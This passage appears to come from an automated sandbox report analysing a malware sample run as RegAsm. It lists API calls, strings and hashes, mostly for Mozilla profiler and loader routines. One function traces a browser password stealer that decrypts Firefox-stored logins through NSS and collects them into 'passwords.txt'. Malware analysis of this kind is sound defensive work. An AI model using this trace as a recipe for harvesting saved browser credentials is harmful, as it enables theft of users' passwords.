strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C05CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C05CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C05CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C05CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C05CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C05CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C05CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C05CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C05CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C05CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C05CE8A

Strings

fileioall, xrefs: 6C05CCA8
processcpu, xrefs: 6C05CE6E
screenshots, xrefs: 6C05CCD4
notimerresolutionchange, xrefs: 6C05CE00
samplingallthreads, xrefs: 6C05CE2C
default, xrefs: 6C05CC21
Unrecognized feature "%s"., xrefs: 6C05CEA0
java, xrefs: 6C05CC37
preferencereads, xrefs: 6C05CD92
fileio, xrefs: 6C05CC92
mainthreadio, xrefs: 6C05CC7C
cpuallthreads, xrefs: 6C05CE16
unregisteredthreads, xrefs: 6C05CE58
leaf, xrefs: 6C05CC66
ipcmessages, xrefs: 6C05CDBE
audiocallbacktracing, xrefs: 6C05CDD4
nativeallocations, xrefs: 6C05CDA8
markersallthreads, xrefs: 6C05CE42
power, xrefs: 6C05CE84
nostacksampling, xrefs: 6C05CD7C
seqstyle, xrefs: 6C05CCE6
noiostacks, xrefs: 6C05CCBE
stackwalk, xrefs: 6C05CCF8
jsallocations, xrefs: 6C05CD0E

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: f337f634b3ab37584f02df50d4a0c10fdf5047aff7f8d9515044567f6f97bf20
Instruction ID: 8763f3829e36bccc064f39bfaa4f768fa222f31aedbbaea172516f7360e72ec7
Opcode Fuzzy Hash: f337f634b3ab37584f02df50d4a0c10fdf5047aff7f8d9515044567f6f97bf20
Instruction Fuzzy Hash: 205189D5A0B36513FE0031356F10BAE14D9EF5A249FD09535DE0DE2F80FB09A62A86B7

Function 0040A916 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 211stringmemoryfileCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A922

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004373A4,0043680F), ref: 0040A9C1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9D9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9E1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9ED
??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA09
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA15
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA1C
StrStrA.SHLWAPI(0040B824,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA2D
StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA47
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA5A
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA64
lstrcatA.KERNEL32(00000000,004373A8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA70
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA7A
lstrcatA.KERNEL32(00000000,004373AC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA86
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA93
lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA9B
lstrcatA.KERNEL32(00000000,004373B0,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAA7
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAB7
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAC7
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AADA

Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
Part of subcall function 0040A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
Part of subcall function 0040A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
Part of subcall function 0040A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
Part of subcall function 0040A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
Part of subcall function 0040A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
Part of subcall function 0040A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAE9
lstrcatA.KERNEL32(00000000,004373B4,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAF5
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB05
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB15
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB28

Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB37
lstrcatA.KERNEL32(00000000,004373B8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB43
lstrcatA.KERNEL32(00000000,004373BC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB4F
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB5F
lstrlenA.KERNEL32(00000000), ref: 0040AB7D
CloseHandle.KERNEL32(?), ref: 0040ABAC
NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040ABB2

Strings

passwords.txt, xrefs: 0040AB89
pe, xrefs: 0040A931

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
String ID: passwords.txt$pe
API String ID: 2725232238-1761351166
Opcode ID: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction ID: 1a907496ddc9cbec6b75df531e31c39fb9952b717cdae40389231e62c8e49acd
Opcode Fuzzy Hash: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction Fuzzy Hash: DF71A331500215ABCF15EFA1DD4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6

Function 6C0247C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C024801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C024817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C02482D
__Init_thread_footer.LIBCMT ref: 6C02484A

Part of subcall function 6C04AB3F: EnterCriticalSection.KERNEL32(6C09E370,?,?,6C013527,6C09F6CC,?,?,?,?,?,?,?,?,6C013284), ref: 6C04AB49
Part of subcall function 6C04AB3F: LeaveCriticalSection.KERNEL32(6C09E370,?,6C013527,6C09F6CC,?,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04AB7C

GetCurrentThreadId.KERNEL32 ref: 6C02485F
GetCurrentThreadId.KERNEL32 ref: 6C02487E
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C02488B
free.MOZGLUE(?), ref: 6C02493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C024956
free.MOZGLUE(00000000), ref: 6C024960
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C02499A

Part of subcall function 6C04AB89: EnterCriticalSection.KERNEL32(6C09E370,?,?,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284), ref: 6C04AB94
Part of subcall function 6C04AB89: LeaveCriticalSection.KERNEL32(6C09E370,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04ABD1

free.MOZGLUE(?), ref: 6C0249C6
free.MOZGLUE(?), ref: 6C0249E9

Part of subcall function 6C035E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C035EDB
Part of subcall function 6C035E90: memset.VCRUNTIME140(6C077765,000000E5,55CCCCCC), ref: 6C035F27
Part of subcall function 6C035E90: LeaveCriticalSection.KERNEL32(?), ref: 6C035FB2

Strings

MOZ_PROFILER_SHUTDOWN, xrefs: 6C024A42
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C024828
[I %d/%d] profiler_shutdown, xrefs: 6C024A06
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C024812
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0247FC

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: 5cfaff38fb4fdbec620ed6ced2a79b06aa78212212fb207b118d068ade6a32bf
Instruction ID: 233e091529218bc5ecf27bad7e50e6b4a90e336610f2c8beed6700928c8362ac
Opcode Fuzzy Hash: 5cfaff38fb4fdbec620ed6ced2a79b06aa78212212fb207b118d068ade6a32bf
Instruction Fuzzy Hash: EA811571A00110ABDB14DFA8C88475E37F9FF42328F541239E91A97B81EB39E954CF96

Function 6C024470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C024730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0244B2,6C09E21C,6C09F7F8), ref: 6C02473E
Part of subcall function 6C024730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C02474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C0244BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C0244D2
InitOnceExecuteOnce.KERNEL32(6C09F80C,6C01F240,?,?), ref: 6C02451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C02455C
LoadLibraryW.KERNEL32(?), ref: 6C024592
InitializeCriticalSection.KERNEL32(6C09F770), ref: 6C0245A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C0245AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C0245BB
InitOnceExecuteOnce.KERNEL32(6C09F818,6C01F240,?,?), ref: 6C024612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C024636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C024644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C02466D
VerSetConditionMask.NTDLL ref: 6C02469F
VerSetConditionMask.NTDLL ref: 6C0246AB
VerSetConditionMask.NTDLL ref: 6C0246B2
VerSetConditionMask.NTDLL ref: 6C0246B9
VerSetConditionMask.NTDLL ref: 6C0246C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0246CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C0246F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C0246FD

Strings

l, xrefs: 6C024578
user32.dll, xrefs: 6C024557, 6C02463F
WRusr.dll, xrefs: 6C0244B5
NativeNtBlockSet_Write, xrefs: 6C0246F7
Gl, xrefs: 6C0244FC
kernel32.dll, xrefs: 6C0244CD

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-142556707
Opcode ID: 8a07c5c7400c2dabb8734a6e465e34c43ad0fc5f4bb58e4554b95b48d0dc81b5
Instruction ID: f97179ed0efe2187e0fc621df9eaddfb5009a8bddd510bfdd22dcd912460d83d
Opcode Fuzzy Hash: 8a07c5c7400c2dabb8734a6e465e34c43ad0fc5f4bb58e4554b95b48d0dc81b5
Instruction Fuzzy Hash: A26126B0604344AFEB108FA0CC09BA57BFCFB46308F14A158F5489B641DBB59A45CF91

Function 6C0219A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C09F760), ref: 6C0219BD
GetCurrentProcess.KERNEL32 ref: 6C0219E5
GetLastError.KERNEL32 ref: 6C021A27
moz_xmalloc.MOZGLUE(?), ref: 6C021A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C021A4F
GetLastError.KERNEL32 ref: 6C021A92
moz_xmalloc.MOZGLUE(?), ref: 6C021AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C021ABA
LocalFree.KERNEL32(?), ref: 6C021C69
free.MOZGLUE(?), ref: 6C021C8F
free.MOZGLUE(?), ref: 6C021C9D
CloseHandle.KERNEL32(?), ref: 6C021CAE
ReleaseSRWLockExclusive.KERNEL32(6C09F760), ref: 6C021D52
GetLastError.KERNEL32 ref: 6C021DA5
GetLastError.KERNEL32 ref: 6C021DFB
GetLastError.KERNEL32 ref: 6C021E49
GetLastError.KERNEL32 ref: 6C021E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C021E9B

Part of subcall function 6C022070: LoadLibraryW.KERNEL32(combase.dll,6C021C5F), ref: 6C0220AE
Part of subcall function 6C022070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0220CD
Part of subcall function 6C022070: __Init_thread_footer.LIBCMT ref: 6C0220E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6C021F15
VerSetConditionMask.NTDLL ref: 6C021F46
VerSetConditionMask.NTDLL ref: 6C021F52
VerSetConditionMask.NTDLL ref: 6C021F59
VerSetConditionMask.NTDLL ref: 6C021F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C021F6D

Strings

D, xrefs: 6C021B57

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: 0273a22e74fa5fbe1f946c7d6b0ca8859ef23827857c905c698d7d76c02f4cee
Instruction ID: ab1f44bb8635f906b41c60ff182783fc66e7419b7dc15917b2e5799b444d5d63
Opcode Fuzzy Hash: 0273a22e74fa5fbe1f946c7d6b0ca8859ef23827857c905c698d7d76c02f4cee
Instruction Fuzzy Hash: D8F18071A05325ABEF209F65CC48B9AB7F8FF49714F104199E909A7640DB79EE80CF90

Function 00424B17 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424B1F
__mtterm.LIBCMT ref: 00424B2B

Part of subcall function 004247EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 004247FB
Part of subcall function 004247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00424815

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424B41
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424B4E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424B5B
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424B68
TlsAlloc.KERNEL32 ref: 00424BB8
TlsSetValue.KERNEL32(00000000), ref: 00424BD3
__init_pointers.LIBCMT ref: 00424BDD
EncodePointer.KERNEL32 ref: 00424BEE
EncodePointer.KERNEL32 ref: 00424BFB
EncodePointer.KERNEL32 ref: 00424C08
EncodePointer.KERNEL32 ref: 00424C15
DecodePointer.KERNEL32(Function_0002496E), ref: 00424C36
__calloc_crt.LIBCMT ref: 00424C4B
DecodePointer.KERNEL32(00000000), ref: 00424C65
__initptd.LIBCMT ref: 00424C70
GetCurrentThreadId.KERNEL32 ref: 00424C77

Strings

FlsSetValue, xrefs: 00424B50
FlsAlloc, xrefs: 00424B3B
FlsGetValue, xrefs: 00424B43
FlsFree, xrefs: 00424B5D
KERNEL32.DLL, xrefs: 00424B1A

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction ID: 9e7d6304cc20a0816a56486267aa260185140d132a286571763312e702071250
Opcode Fuzzy Hash: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction Fuzzy Hash: F7312C35E053609ADB23AF7ABD0860A3BA4EF85722B51063BE410D32B1DBB9D440DF5D

Function 6C05E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C057090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C05B9F1,?), ref: 6C057107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C05DCF5), ref: 6C05E92D
GetCurrentThreadId.KERNEL32 ref: 6C05EA4F
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EA5C
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EA80
GetCurrentThreadId.KERNEL32 ref: 6C05EA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C05DCF5), ref: 6C05EA92
GetCurrentThreadId.KERNEL32 ref: 6C05EB11
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C05EB3C
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EB5B

Part of subcall function 6C055710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C05EB71), ref: 6C0557AB

Part of subcall function 6C04CBE8: GetCurrentProcess.KERNEL32(?,6C0131A7), ref: 6C04CBF1
Part of subcall function 6C04CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0131A7), ref: 6C04CBFA

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C05EBAC

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

GetCurrentThreadId.KERNEL32 ref: 6C05EBC1
AcquireSRWLockExclusive.KERNEL32(6C09F4B8,?,?,00000000), ref: 6C05EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C05EBE5
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8,00000000), ref: 6C05EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C05EC46
CloseHandle.KERNEL32(?), ref: 6C05EC55
free.MOZGLUE(00000000), ref: 6C05EC5C

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C05EA9B
[I %d/%d] profiler_start, xrefs: 6C05EBB4

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

